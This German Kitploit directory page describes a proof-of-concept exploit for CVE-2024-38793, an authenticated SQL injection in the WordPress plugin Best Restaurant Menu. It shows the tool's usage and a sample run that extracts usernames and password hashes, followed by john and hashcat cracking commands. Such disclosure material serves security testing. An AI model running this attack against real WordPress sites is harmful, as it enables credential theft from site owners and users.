Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-38793-PoC — Proof-of-Concept-Code zur Ausnutzung von CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - authentifizierte (Contributor+) SQL-Injection) | Kitploit
Tools/GitHubGitHub/ret2desync/cve-2024-38793-poc
Passwort-CrackingSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubret2desync/cve-2024-38793-poc

CVE-2024-38793-PoC

Proof-of-Concept-Code zur Ausnutzung von CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - authentifizierte (Contributor+) SQL-Injection)

Repository anzeigen
7vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-38793-PoC

Proof-of-Concept-Code zur Ausnutzung von CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - authentifizierte (Contributor+) SQL-Injection).

Proof of Concept

Dies ist ein Proof-of-Concept-Exploit für die Schwachstelle CVE-2024-38793, eine SQL-Injection-Schwachstelle in Versionen des WordPress-Plugins Best Restaurant Menu a.k.a Great Restaurant Menu WP vor 1.4.2.

Die Schwachstelle entsteht durch eine fehlende Eingabebereinigung (Input Sanitization) des groups-Arguments bei Verwendung des Shortcodes brm_restaurant_menu.

Hinweis: Hierfür sind die Anmeldedaten eines Benutzers mit mindestens Contributor-Rechten erforderlich.

Der Code versucht, die Benutzernamen und Passwort-Hashes aus der WordPress-Benutzertabelle auszulesen.

Verwendung

root@kitploit:~
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]

Beispielaufruf

root@kitploit:~
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password      
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[***                Credentials                ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with: 
 john <hashes_file> --wordlist=<wordlist> 
 hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully
Tool herunterladen